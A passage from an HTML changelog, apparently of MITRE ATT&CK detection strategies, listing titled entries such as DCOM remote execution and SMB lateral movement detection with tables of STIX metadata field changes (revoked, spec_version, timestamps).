collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0368] Hardware Supply Chain Compromise Detection via Host Status & Boot Integrity Checks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0133] IDE Tunneling Detection via Process, File, and Network Behaviors</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0200] Indirect Command Execution – Windows utility abuse behavior chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0075] Internal Proxy Behavior via Lateral Host-to-Host C2 Relay</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0054] Internal Spearphishing via Trusted Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0082] Internal Website and System Content Defacement via UI or Messaging Modifications</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0031] Invalid Code Signature Execution Detection via Metadata and Behavioral Context</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0390] Linux Detection Strategy for T1547.013 - XDG Autostart Entries</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0258] Linux Python Startup Hook Persistence via .pth and Customize Files (T1546.018)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0303] Local Account Enumeration Across Host Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0188] Local Storage Discovery via Drive Enumeration and Filesystem Probing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0292] Masquerading via Space After Filename - Behavioral Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0285] Multi-Event Behavioral Detection for DCOM-Based Remote Code Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0530] Multi-Event Detection for SMB Admin Share Lateral Movement</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0540] Multi-Platform Behavioral Detection for Compute Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New 